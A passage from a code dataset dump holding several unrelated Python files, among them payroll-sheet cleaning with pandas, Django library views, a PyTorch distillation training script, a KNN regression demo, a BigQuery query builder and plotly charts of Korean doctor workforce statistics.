print(\"not empty\")\n'''\n\n\n\n\ndef tryconvert(value):\n #dt = (datetime.fromordinal(datetime(1900, 1, 1).toordinal() + int(value) - 2)).strftime('%d/%m/%Y')\n print(value, 'it')\n try:\n value = float(value)\n value = int(value)\n except ValueError:\n #print(type(value))\n pass\n #value = datetime.fromtimestamp(value/1000.0)\n dt = pd.to_datetime(value)#(datetime.strptime(value, '%d/%m/%Y'))\n #print(type(dt))\n #print(dt, type(dt))\n #print(type(dt))\n return dt\n '''try:\n dt = (datetime.fromordinal(datetime(1900, 1, 1).toordinal() + int(value) - 2)).strftime('%d/%m/%Y')\n #print(dt, type(dt))\n return dt\n except:\n #print(value)\n return value\n '''\ndef convert_to_shift(x):\n dict_shift={'T':'Twighlight', 'N': 'Night', 'D':'Day'}\n x = str(x)\n x = x.strip()\n shift = x[-1]\n try:\n shift = dict_shift[shift]\n #print(shift)\n return shift\n except (KeyError):\n #print(x)\n return x\n\ndef creating_DB():\n a =[]\n dateparse = lambda x: pd.datetime.strptime(x, '%Y-%m-%d')\n\n #df = pd.read_csv(infile, parse_dates=['datetime'], date_parser=dateparse)\n\n for filename in os.listdir('ANZLUsheets'):\n print(filename)\n tempdf = pd.read_csv('ANZLUsheets/'+ filename)#, parse_dates=['Date'], date_parser=dateparse)\n #tempdf['Date']=str(tempdf['Date'])\n #month = list(filename)\n #month = ''.join(month[0:4]) + '/' + ''.join(month[4:6])\n #date = [month for i in range(0,tempdf.shape[0])]\n #tempdf['date'] = date\n a.append(tempdf)\n df = pd.concat(a)\n\n paycode_dict = {}\n temp = df['Pay Code'][:]\n print(temp is df['Pay Code'])\n for leave_type in temp.unique():\n leave_type = str(leave_type)\n if 'SICK' in leave_type:\n if 'PAID' in leave_type:\n paycode_dict[leave_type] = 'SICK_PAID'\n else:\n paycode_dict[leave_type] = 'SICK'\n elif 'BEREAVEMENT' in leave_type:\n paycode_dict[leave_type] = 'BEREAVEMENT'\n elif 'OT' in leave_type:\n paycode_dict[leave_type] = 'OVERTIME'\n elif 'UNAPPROVED' in leave_type:\n paycode_dict[leave_type] = 'UNAPPROVED'\n else:\n paycode_dict[leave_type] = 'NORM'\n print(paycode_dict)\n print(temp.head)\n #print(temp.columns)\n temp = temp.map(paycode_dict)\n print(temp.head)\n df['Pay Code'] = temp\n df['Shift'] = df['LL6'].apply(lambda x: convert_to_shift(x))\n\n df['Last Name'] =df['First Name'] + df['Last Name']\n df.drop(columns = ['First Name'])\n #df['Date'] = df['Date'].apply(lambda x: tryconvert(x))\n\n #df[\"Pay Code\"] = df[\"Pay Code\"].map(paycode_dict)\n df.to_csv('DB_ANZLU_CLEAN.csv')\n\n\ndef check_necessary_update():\n today = datetime.datetime.today()\n today = str(today.year) + str(today.month) + '.csv'\n if today != os.listdir(sheetsPath)[-1]:\n #open_file('ANZLU.xlsx')\n #creating_DB()\n return True\n else:\n return False\ndef update():\n open_file('ANZLU.xlsx')\n creating_DB()\n os.system('streamlit run laybouranalysis.py')\n return\n#check_necessary_update()\n''' #dt = (datetime.fromordinal(datetime(1900, 1, 1).toordinal() + int(value) - 2)).strftime('%d/%m/%Y')\nprint(value, 'it')\ntry:\n value = float(value)\n value = int(value)\nexcept ValueError:\n #print(type(value))\n pass\n#value = datetime.fromtimestamp(value/1000.0)\ndt = pd.to_datetime(value)#(datetime.strptime(value, '%d/%m/%Y'))\n#print(type(dt))\n#print(dt, type(dt))\n#print(type(dt))\nreturn dt\n#print(value)\n#print(type(value))\n#value = 'nan'\n#return value'''","sub_path":"creatingDB.py","file_name":"creatingDB.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549558342","text":"\"\"\"\n 封装\n 行为: 标准属性\n 练习:exercise06.py\n 练习:exercise07.py\n\"\"\"\n\n# 读写属性age\nclass Wife:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n @property# 拦截读取 age = property(读取方法,None)\n def age(self):\n return self.__age\n\n @age.setter # 拦截写入 age.setter(写入方法)\n def age(self, value):\n if 20 <= value <= 50:\n self.__age = value\n else:\n raise ValueError(\"我不要\")\n\nw01 = Wife(\"小乔\", 25)\n# print(w01.get_age())\nprint(w01.age)\n\n# ---------------------------\n# 只读属性age\nclass Wife2:\n def __init__(self, name):\n self.name = name\n self.__age = 23\n\n @property# 拦截读取 age = property(读取方法,None)\n def age(self):\n return self.__age\n\nw02 = Wife2(\"大桥\")\n# w02.age = 30\n#---------------------\n# 只写属性age\nclass Wife3:\n def __init__(self, name):\n self.name = name\n self.age = 23\n\n def set_age(self, value):\n if 20 <= value <= 50:\n self.__age = value\n else:\n raise ValueError(\"我不要\")\n\n age = property(None,set_age)\n\nw03 = Wife3(\"大桥\")\nw03.age = 30\n# print(w03.age)# 不能读取\n","sub_path":"python_base/code/day10/demo05.py","file_name":"demo05.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415534427","text":"from django.shortcuts import render\nfrom django.http import JsonResponse, HttpResponse\nfrom django.template.loader import render_to_string\nfrom .models import librarybooks, BooksToStudents\nfrom django.db.utils import IntegrityError\nfrom admin2_manage.models import studentdetail\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom collections import defaultdict\ndef librarymain(request):\n books = librarybooks.objects.all()\n print(\"yessss\")\n print(books)\n return render(request, 'library.html', {'books': books})\n\n\ndef addBooks(request):\n if request.method == \"POST\":\n book_id = request.POST.get('book_id')\n book_name = request.POST['book_name']\n book_author = request.POST['book_author']\n no_books = request.POST['no_books']\n if no_books == 0 or len(book_name) == 0 or len(book_author) == 0:\n return JsonResponse({'status': 'wrong'})\n try:\n if (book_id == ''):\n book = librarybooks(book_name=book_name, book_author=book_author, book_ava=no_books)\n else:\n book = librarybooks(book_id=book_id, book_name=book_name, book_author=book_author, book_ava=no_books)\n book.save()\n except IntegrityError:\n return JsonResponse({'status': 'exist'})\n all_book = librarybooks.objects.values()\n book_data = list(all_book)\n return JsonResponse({'status': 'save', 'book_data': book_data})\n\n\ndef delete_book(request):\n if request.method == \"POST\":\n id = request.POST.get('sid')\n book_id = librarybooks.objects.get(book_id=id)\n book_id.delete()\n return JsonResponse({'status': 'done'})\n else:\n return JsonResponse({'status': 'undone'})\n\n\ndef edit_book(request):\n id = \"17EEBCS010\"\n ans = studentdetail.objects.get(student_id=id)\n check = BooksToStudents.objects.filter(stud_id__student_id='17EEBCS010')\n print(check)\n for ch in check:\n print(ch.books_id)\n if request.method == \"POST\":\n id = request.POST.get('sid')\n print(id)\n book_id = librarybooks.objects.get(book_id=id)\n book_data = {\"id\": book_id.book_id, \"name\": book_id.book_name, \"author\": book_id.book_author,\n \"number\": book_id.book_ava}\n return JsonResponse({'status': 'done', 'book_data': book_data})\n else:\n return JsonResponse({'status': 'undone'})\n\n\ndef booktostudent(request):\n dic = defaultdict(list)\n if request.method == \"POST\":\n bk_id = request.POST['book_id']\n date = request.POST['date']\n sd_id = request.POST['stud_id']\n stud_id = studentdetail.objects.get(student_id=sd_id)\n book_id = librarybooks.objects.get(book_name=bk_id)\n obj = BooksToStudents(stud_id=stud_id, books_id=book_id, date_issue=date)\n obj.save()\n check = BooksToStudents.objects.filter(stud_id__student_id=stud_id)\n for ch in check:\n dic[ch.bs_id] = [ch.books_id.book_name, ch.date_issue]\n return JsonResponse({'status': 'save','booksdata':dic})\n else:\n return JsonResponse({'satus': 'not_save'})\n\n\ndef studentbookdata(request):\n dic=defaultdict(list)\n if request.method==\"POST\":\n reg_id=request.POST['reg_id']\n try:\n student=studentdetail.objects.filter(student_id=reg_id).values()\n except ObjectDoesNotExist:\n student=None\n if student==None or len(student)==0:\n return JsonResponse({'status':'not_exist'})\n else:\n check = BooksToStudents.objects.filter(stud_id__student_id=reg_id)\n for ch in check:\n dic[ch.bs_id]=[ch.books_id.book_name,ch.date_issue]\n return JsonResponse({'status':'save','student':list(student),'bookstostudent':dic})\n else:\n return JsonResponse({'status':'not_save'})\n\ndef deletestudentbook(request):\n if request.method==\"POST\":\n bs_id=request.POST['id']\n print(bs_id)\n object=BooksToStudents.objects.get(bs_id=bs_id)\n object.delete()\n return JsonResponse({'status':'save'})\n else:\n return JsonResponse({'status':'not_save'})","sub_path":"librarymangement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172230006","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport network\nfrom utils.dataloader import tinyimagenet_dataloader\nfrom utils.TinyImageNet_hierarchy import TinyImageNet_Superclass\nimport os\n\n\ndef idx_search(Superclasses):\n All_class = []\n for cls_name in Superclasses:\n All_class += TinyImageNet_Superclass[cls_name]\n All_class.sort()\n idx_dict = {}\n for supclass in Superclasses:\n idx_temp = []\n for i in TinyImageNet_Superclass[supclass]:\n idx_temp.append(All_class.index(i))\n idx_dict[supclass] = idx_temp\n\n return idx_dict\n\n\ndef total_combine(Superclasses):\n All_class = []\n for cls_name in Superclasses:\n All_class += TinyImageNet_Superclass[cls_name]\n All_class.sort()\n\n return All_class\n\n\ndef SD_distillation(y, teacher_scores, T, idx):\n p = F.log_softmax(y/T, dim=1) # student 20\n q = F.softmax(teacher_scores/T, dim=1) # teacher 5\n q_zeros = torch.zeros_like(p)\n q_zeros[:, idx] = q\n l_kl = F.kl_div(p, q_zeros, size_average=False) * (T**2) / y.shape[0]\n return l_kl\n\n\ndef train(args, teacher, student, device, train_loader, optimizer, epoch, idx_dict):\n ex, cl = [], []\n\n for i in teacher:\n ex.append(i[0].eval())\n cl.append(i[1].eval())\n\n student_EX, student_CL = student\n student_EX.train()\n student_CL.train()\n\n for batch_idx, (data, _) in enumerate(train_loader):\n data = data.to(device)\n\n optimizer.zero_grad()\n\n logit_list = []\n for i in range(len(args.Superclasses)):\n logit_list.append(cl[i](ex[i](data)).detach())\n\n s_logit = student_CL(student_EX(data))\n\n loss_list = []\n for i, j in enumerate(logit_list):\n temp_loss = SD_distillation(s_logit, j.detach(), 4, idx_dict[args.Superclasses[i]])\n loss_list.append(temp_loss)\n\n loss = sum(loss_list) / len(loss_list)\n loss.backward()\n optimizer.step()\n\n if args.verbose and batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tLr: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item(), optimizer.param_groups[0]['lr']))\n\n\ndef test(student, device, test_loader, cur_epoch, test_only=False):\n student_EX, student_CL = student\n student_EX.eval()\n student_CL.eval()\n\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = student_CL(student_EX(data))\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n if test_only:\n return correct / len(test_loader.dataset)\n\n print('\\nEpoch {} Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n cur_epoch, test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n return correct / len(test_loader.dataset)\n\n\ndef get_model(args):\n os.makedirs('DB_pretrained/SD_Scratch', exist_ok=True)\n\n total_idx = total_combine(args.Superclasses)\n idx_dict = idx_search(args.Superclasses)\n\n train_loader, test_loader = tinyimagenet_dataloader(args, train_subidx=total_idx, test_subidx=total_idx)\n\n student_EX = network.wresnet.wideresnet_ex(depth=16, num_classes=200, widen_factor=2, dropRate=0.0)\n student_CL = network.wresnet.wideresnet_cl(depth=16, num_classes=len(total_idx), EX_widen_factor=2,\n widen_factor=(0.25*len(args.Superclasses)), dropRate=0.0)\n\n student_EX_path = './DB_pretrained/SD_Scratch/SD_Scratch_EX_%s.pt' % args.Superclasses\n student_CL_path = './DB_pretrained/SD_Scratch/SD_Scratch_CL_%s.pt' % args.Superclasses\n\n if args.model_pretrained is True:\n student_EX.load_state_dict(torch.load(student_EX_path))\n student_CL.load_state_dict(torch.load(student_CL_path))\n\n student_EX, student_CL = student_EX.to(args.device), student_CL.to(args.device)\n student_EX, student_CL = student_EX.eval(), student_CL.eval()\n\n student = [student_EX, student_CL]\n best_acc = test(student, args.device, test_loader, 0, True)\n print(\"\\nModel for %s Acc=%.2f%%\" % (args.Superclasses, best_acc*100))\n\n return\n\n student_EX, student_CL = student_EX.to(args.device), student_CL.to(args.device)\n\n Scratch_EX = []\n for s in args.Superclasses:\n Scratch_EX_path = './DB_pretrained/Scratch/Scratch_EX_%s.pt' % [s]\n e = network.wresnet.wideresnet_ex(depth=16, num_classes=200, widen_factor=2, dropRate=0.0)\n e.load_state_dict(torch.load(Scratch_EX_path))\n e = e.to(args.device)\n e.eval()\n Scratch_EX.append(e)\n\n Scratch_CL = []\n for s in args.Superclasses:\n Scratch_CL_path = './DB_pretrained/Scratch/Scratch_CL_%s.pt' % [s]\n e = network.wresnet.wideresnet_cl(depth=16, num_classes=len(TinyImageNet_Superclass[s]),\n EX_widen_factor=2, widen_factor=0.25, dropRate=0.0)\n e.load_state_dict(torch.load(Scratch_CL_path))\n e = e.to(args.device)\n e.eval()\n Scratch_CL.append(e)\n\n teacher = []\n for i in zip(Scratch_EX, Scratch_CL):\n teacher.append(i)\n\n optimizer_S = optim.SGD(list(student_EX.parameters())+list(student_CL.parameters()), lr=args.lr,\n weight_decay=args.weight_decay, momentum=0.9)\n\n if args.scheduler:\n scheduler_S = optim.lr_scheduler.MultiStepLR(optimizer_S, [80, 160], 0.1)\n\n best_acc = 0\n\n student = [student_EX, student_CL]\n\n for epoch in range(1, args.model_epochs + 1):\n if args.scheduler:\n scheduler_S.step()\n\n train(args, teacher=teacher, student=student, device=args.device, train_loader=train_loader,\n optimizer=optimizer_S, epoch=epoch, idx_dict=idx_dict)\n acc = test(student, args.device, test_loader, epoch)\n\n if acc > best_acc:\n best_acc = acc\n torch.save(student_EX.state_dict(), student_EX_path)\n torch.save(student_CL.state_dict(), student_CL_path)\n\n print(\"\\nModel for %s Acc=%.2f%%\" % (args.Superclasses, best_acc*100))\n","sub_path":"TinyImageNet/SD_Scratch/SD_Scratch/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443181572","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 2 13:09:20 2017\n\n@author: 凯风\n\"\"\"\n\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\n\n# 准备数据\nboston = load_boston()\nX,Y = boston.data,boston.target\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=.3)\n\n'''\n K近邻回归:\n 优点:易于理解、无序评估过多参数\n 缺点:对不平衡问题存在较大问题、计算量大\n 模型的复杂度取决于algorithm,不同的构造树方法产生不同的复杂度\n'''\n\nrg = KNeighborsRegressor(n_neighbors=5, weights='distance', algorithm='auto', leaf_size=30, p=2, metric='minkowski', metric_params=None, n_jobs=1)\nrg.fit(X_train,Y_train)\nY_pre = rg.predict(X_test)\nrg.score(X_test,Y_test)\n\n'''\n n_neighbors 最重要的参数了算是,近邻数\n weights 权重形式\n uniform 每个样本均相等\n distance 按距离付给每个样本权重\n [callable] 用户自定义\n algorithm 用于计算最近邻的算法\n leaf_size 上一个参数中,需要一些叶节点数,传递给其中的比如kt-tree\n p 和下一个参数的一起用的,计算距离的\n metric 树的距离计算\n metric_params 上一个参数的一起用的\n n_jobs 暂不重要\n'''","sub_path":"Regression/Nearest_Neighbors_Regression.py","file_name":"Nearest_Neighbors_Regression.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182211308","text":"class HistQueryFactory(object):\n \"\"\"\n h = HistQueryFactory()\n h.add_variable(\"R\",0,10,40)\n h.add_variable(\"BetaTOF\",0,1,10)\n h.add_condition(\"Rcutoff < R\")\n h.add_condition(\"Latitude > 0.8\")\n h.add_condition(\"Latitude < 0.9\")\n print str(h)\n \"\"\" \n def __init__(self, table=\"full_test.full_test\", bins='mid'):\n self.table = table\n self.bins = bins\n self.variables = {}\n self.binnames = {}\n self.varorder = []\n self.extra_conditions = []\n self.aggregators = [] \n self.join = None \n \n def add_variable(self, var, min=0, max=1, nbins=100, binname=None):\n self.variables[var] = [min, max, nbins]\n self.binnames[var] = var+\"_BIN\" if binname is None else binname\n self.varorder.append(var)\n \n def add_condition(self, condition):\n self.extra_conditions.append(condition)\n \n def add_aggregator(self, aggregator):\n self.aggregators.append(aggregator)\n \n def add_join(self, join, on, alias):\n self.join = (str(join), on, alias)\n \n def get_variables(self):\n return [self.binnames[v] for v in self.varorder]\n \n def __str__(self):\n select, where = [], []\n binexpr = \"STRING({mi:f} + ({rng:f})*FLOOR({N:f}*(({var})-({mi:f}))/{rng:f})/{N:f}) as {bname}\"\n for v in self.varorder:\n mi,ma,nb = self.variables[v]\n bname = self.binnames[v]\n select.append(binexpr.format(var=v, mi=mi, N=nb, rng=ma-mi, bname=bname))\n where.append(\"{0} >= {1} AND {0} < {2}\".format(v,mi,ma))\n \n if not self.aggregators:\n select += [\"COUNT(1) as count\"]\n else:\n select += self.aggregators \n \n where += self.extra_conditions\n \n if self.join is not None:\n self.table += \" JOIN EACH ({0}) AS {1} ON {2}\".format(*self.join)\n \n query = \\\n \"SELECT\\n {select}\\n\"\\\n \"FROM\\n {from}\\n\"\\\n \"WHERE\\n {where}\\n\"\\\n \"GROUP BY {bins}\\n\"\\\n \"ORDER BY {bins}\\n\"\n \n dic = {\n \"select\": \",\\n \".join(select),\n \"from\": self.table,\n \"where\":\" AND\\n \".join(where),\n \"bins\":\",\".join(self.get_variables())\n }\n return query.format(**dic) \n","sub_path":"mcmc_py/histQueryFactory.py","file_name":"histQueryFactory.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"171152724","text":"import plotly.express as px\nimport plotly.graph_objects as go\nimport pandas as pd\nimport numpy as np\nfrom plotly.subplots import make_subplots\n\n\n# 연도별, 성별 사망의사수 그래프\ndef makeDDFigure(dfDeadDoctor,year):\n year = str(year)\n\n exdfDeadPerson0 = dfDeadDoctor[0].iloc[:,26:]\n exdfDeadPerson0['성별']='Man'\n exdfDeadPerson1 = dfDeadDoctor[1].iloc[:,26:]\n exdfDeadPerson1['성별']='Woman'\n exdfDeadPerson = pd.concat([exdfDeadPerson0,exdfDeadPerson1])\n exdfDeadPerson = exdfDeadPerson.reset_index().rename(columns={\"index\": \"연도\"}).set_index('성별')\n\n deadPersonDict = {}\n\n for i in range(1952,2048):\n data = exdfDeadPerson[exdfDeadPerson['연도']==i]\n data.drop(['연도'], axis='columns', inplace=True)\n data = data.rename_axis(None).T\n data = data.reset_index().rename(columns={'index':'age'})\n deadPersonDict.setdefault(str(i), data)\n \n dead = deadPersonDict[year]\n trace3 = go.Bar(x=dead.age, y=dead.Man, name='남성',text=dead.Man,textposition='outside')\n trace4 = go.Bar(x=dead.age, y=dead.Woman, name='여성',text=dead.Woman,textposition='outside')\n\n data = [trace3, trace4]\n layout = go.Layout(title=year+'년 연령별 성별 사망 의사수')\n fig = go.Figure(data=data, layout=layout)\n\n fig.update_layout(\n # height=500,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,30])\n \n )\n\n fig.update_yaxes(title_text=\"사망 의사수\")\n fig.update_xaxes(title_text=\"연령\") \n\n return fig\n\n# 연도별, 성별 신규의사수\ndef makeNDFigure(dfNewDoctor,year):\n year = str(year)\n\n exdfNewPerson0 = dfNewDoctor[0].iloc[:,26:40]\n exdfNewPerson0['성별']='Man'\n exdfNewPerson1 = dfNewDoctor[1].iloc[:,26:40]\n exdfNewPerson1['성별']='Woman'\n exdfNewPerson = pd.concat([exdfNewPerson0,exdfNewPerson1])\n exdfNewPerson = exdfNewPerson.reset_index().rename(columns={\"index\": \"연도\"}).set_index('성별')\n\n newPersonDict = {}\n\n for i in range(1952,2048):\n data = exdfNewPerson[exdfNewPerson['연도']==i]\n data.drop(['연도'], axis='columns', inplace=True)\n data = data.rename_axis(None).T\n data = data.reset_index().rename(columns={'index':'age'})\n newPersonDict.setdefault(str(i), data)\n \n new = newPersonDict[year]\n trace3 = go.Bar(x=new.age, y=new.Man, name='남성',text=new.Man,textposition='outside')\n trace4 = go.Bar(x=new.age, y=new.Woman, name='여성',text=new.Woman,textposition='outside')\n\n data = [trace3, trace4]\n layout = go.Layout(title=year+'년 연령별 성별 신규 의사수')\n fig = go.Figure(data=data, layout=layout)\n\n fig.update_layout(\n # height=500,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,2000]) \n )\n\n fig.update_yaxes(title_text=\"신규 의사수\")\n fig.update_xaxes(title_text=\"연령\") \n return fig\n\n# 연도별, 성별 은퇴의사수\ndef makeRDFigure(dfRetireDoctor,year):\n year = str(year)\n\n exdfRetirePerson0 = dfRetireDoctor[0].iloc[:,45:95]\n exdfRetirePerson0['성별']='Man'\n exdfRetirePerson1 = dfRetireDoctor[1].iloc[:,45:95]\n exdfRetirePerson1['성별']='Woman'\n exdfRetirePerson = pd.concat([exdfRetirePerson0,exdfRetirePerson1])\n exdfRetirePerson = exdfRetirePerson.reset_index().rename(columns={\"index\": \"연도\"}).set_index('성별')\n\n retirePersonDict = {}\n\n for i in range(1952,2048):\n data = exdfRetirePerson[exdfRetirePerson['연도']==i]\n data.drop(['연도'], axis='columns', inplace=True)\n data = data.rename_axis(None).T\n data = data.reset_index().rename(columns={'index':'age'})\n retirePersonDict.setdefault(str(i), data)\n \n retire = retirePersonDict[year]\n trace3 = go.Bar(x=retire.age, y=retire.Man, name='남성',text=retire.Man,textposition='outside')\n trace4 = go.Bar(x=retire.age, y=retire.Woman, name='여성',text=retire.Woman,textposition='outside')\n\n data = [trace3, trace4]\n layout = go.Layout(title=year+'년 연령별 성별 은퇴 의사수')\n fig = go.Figure(data=data, layout=layout)\n\n fig.update_layout(\n # height=500,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,120])\n \n )\n fig.update_yaxes(title_text=\"은퇴 의사수\")\n fig.update_xaxes(title_text=\"연령\") \n return fig\n\ndef getDataframe(dfResultPerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfResultPerson[0].iloc[:,20:90]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n \n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfResultPerson[1].iloc[:,20:90]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n\n #남여 의사 인력 DataFrame, 변수명 bothDoc\n bothDoc = dfResultPerson[2]\n index = list(range(1950,2048))\n bothDoc = bothDoc.set_index([index])\n return [manDoc, womDoc, bothDoc]\n\ndef slicingPerson(dfResultPerson, year):\n value = []\n bothDoc =getDataframe(dfResultPerson)\n value.append(bothDoc[0].iloc[year])\n value.append(bothDoc[1].iloc[year])\n return value\n\n# 연도별, 성별 전체의사수 그래프\ndef makeANDFigure(dfResultPerson, year):\n yearValue = int(year)\n yearIndex = yearValue-1950\n\n womOfYear = pd.DataFrame(slicingPerson(dfResultPerson, yearIndex)[1])\n womOfYear = womOfYear.rename_axis('age').reset_index()\n numOfWom = womOfYear[yearValue].tolist()\n\n docManYear = pd.DataFrame(slicingPerson(dfResultPerson, yearIndex)[0])\n docManYear = docManYear.rename_axis('age').reset_index()\n numOfMan = docManYear[yearValue].tolist()\n text = docManYear[yearValue]\n \n trace3 = go.Bar(name='남성', x=list(docManYear['age']), y=list(docManYear[yearValue]))\n trace4 = go.Bar(name = '여성', x=list(womOfYear['age']), y=list(womOfYear[yearValue]))\n\n data = [trace3, trace4]\n layout = go.Layout(title=str(year)+'년 연령별 의사수')\n fig = go.Figure(data=data, layout=layout)\n fig.update_traces(text=text, textposition='outside')\n fig.update_layout(\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,3000])\n )\n\n fig.update_yaxes(title_text=\"의사수\")\n fig.update_xaxes(title_text=\"연령\")\n\n return fig\n\ndef thousandDocGet(dfThousandPerDoctor):\n docPer1000 = dfThousandPerDoctor\n docPer1000 = docPer1000.dropna(axis = 0, how = 'any')\n #index 변경\n index = list(range(1950,2048))\n docPer1000 = docPer1000.set_index([index])\n docPer1000.columns = ['docnum']\n return docPer1000\n\ndef OECDDocGet():\n OECDPer1000 = pd.read_excel('data/OECD의사수.xlsx')\n OECDPer1000.columns = ['Division', 'Country', 'Year', 'Value']\n OECDPer1000Mean = OECDPer1000.groupby(['Division','Year']).mean()\n OECDPer1000Mean = OECDPer1000Mean.iloc[0:60,:]\n OECDPer1000Mean = OECDPer1000Mean.reset_index()\n year=list(OECDPer1000Mean['Year'])\n OECDValue = list(OECDPer1000Mean['Value'])\n mask = (OECDPer1000.Year > 2019) & (OECDPer1000.Division == '1000명당 의사수')\n OECDPer1000Regression = OECDPer1000.loc[mask, :]\n OECDPer1000Regression = OECDPer1000Regression[['Division','Year','Value']]\n OECDPer1000RegressionYear = list(OECDPer1000Regression['Year'])\n OECDPer1000RegressionValue = list(OECDPer1000Regression['Value'])\n year = year+OECDPer1000RegressionYear\n OECDValue = np.around(np.array(OECDValue+OECDPer1000RegressionValue),2)\n\n return OECDValue\n\n\n# 1000명당 국내 의사수 그래프\ndef makeFigureDocPer1000(dfThousandPerDoctor):\n fig = go.Figure()\n\n docPer1000 = thousandDocGet(dfThousandPerDoctor)\n docPerThousend = list(docPer1000['docnum']) # 1000명당 국내 의사 수 \n OECDPerData = OECDDocGet()\n\n fig.add_trace(go.Scatter(x=np.array(range(1950,2048)), y=docPerThousend,\n mode='lines',\n name='대한민국'))\n fig.add_trace(go.Scatter(x=np.array(range(1960,2048)), y=OECDPerData,\n mode='lines',\n name='OECD평균'))\n\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"인구 1000명당 의사수\")\n fig.update_xaxes(title_text=\"연도\") \n\n return fig\n\n# 의사 1명당 연간 외래진료수 그래프\ndef makeFigureVisitDoctor(npVisitData):\n npVisitData = np.around(npVisitData,2)\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(x=np.array(range(2010,2048)), y=npVisitData[0],\n mode='lines',\n name='대한민국'))\n fig.add_trace(go.Scatter(x=np.array(range(2010,2048)), y=npVisitData[1],\n mode='lines',\n name='OECD평균'))\n\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n fig.update_yaxes(title_text=\"의사 1명당 연간 외래진료 수\")\n fig.update_xaxes(title_text=\"연도\") \n\n return fig\n\n# 연간 전체 의사수\ndef makeFigureSumDoc(dfResultPerson,dfPopulation,npRealDoctor, npRealWorkDoctor):\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n \n year = list(range(1950, 2048))\n docData =getDataframe(dfResultPerson)\n manSumDoc = list(docData[0].sum(axis=1))\n womSumDoc = list(docData[1].sum(axis=1))\n bothSumDoc = list(docData[2].sum(axis=1))\n popDoc = list(np.array(dfPopulation.T)[0])\n \n fig.add_trace(go.Scatter(x=year, y=manSumDoc,\n mode='lines',\n name='A-추정 남성 활동 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=year, y=womSumDoc,\n mode='lines',\n name='A-추정 여성 활동 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=year, y=bothSumDoc,\n mode='lines',\n name='A-추청 전체 활동 의사수'), secondary_y=False)\n\n fig.add_trace(go.Scatter(x=list(range(2003, 2021)), y=npRealWorkDoctor[53:71],\n mode='lines', visible='legendonly',\n name='A-실제 활동 의사수'), secondary_y=False) \n\n fig.add_trace(go.Scatter(x=list(range(1955, 2018)), y=npRealDoctor[1][5:79],\n mode='lines', visible='legendonly',\n name='A-실제 남성 신고 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=list(range(1955, 2018)), y=npRealDoctor[2][5:79],\n mode='lines', visible='legendonly',\n name='A-실제 여성 신고 의사수'), secondary_y=False)\n fig.add_trace(go.Scatter(x=list(range(1955, 2018)), y=npRealDoctor[0][5:79],\n mode='lines', visible='legendonly',\n name='A-실제 전체 신고 의사수'), secondary_y=False) \n\n fig.add_trace(go.Scatter(x=list(range(1950, 2047)), y=popDoc,\n mode='lines',\n name='B-인구수'), secondary_y=True)\n fig.update_layout(margin=dict(l=0,r=0,t=1,b=0), \n showlegend=True,\n legend=dict(\n yanchor=\"top\",\n y=0.99,\n xanchor=\"left\",\n x=0.01\n ))\n\n # Set y-axes titles\n fig.update_yaxes(title_text=\"A-의사수\", secondary_y=False)\n fig.update_yaxes(title_text=\"B-인구수\", secondary_y=True)\n 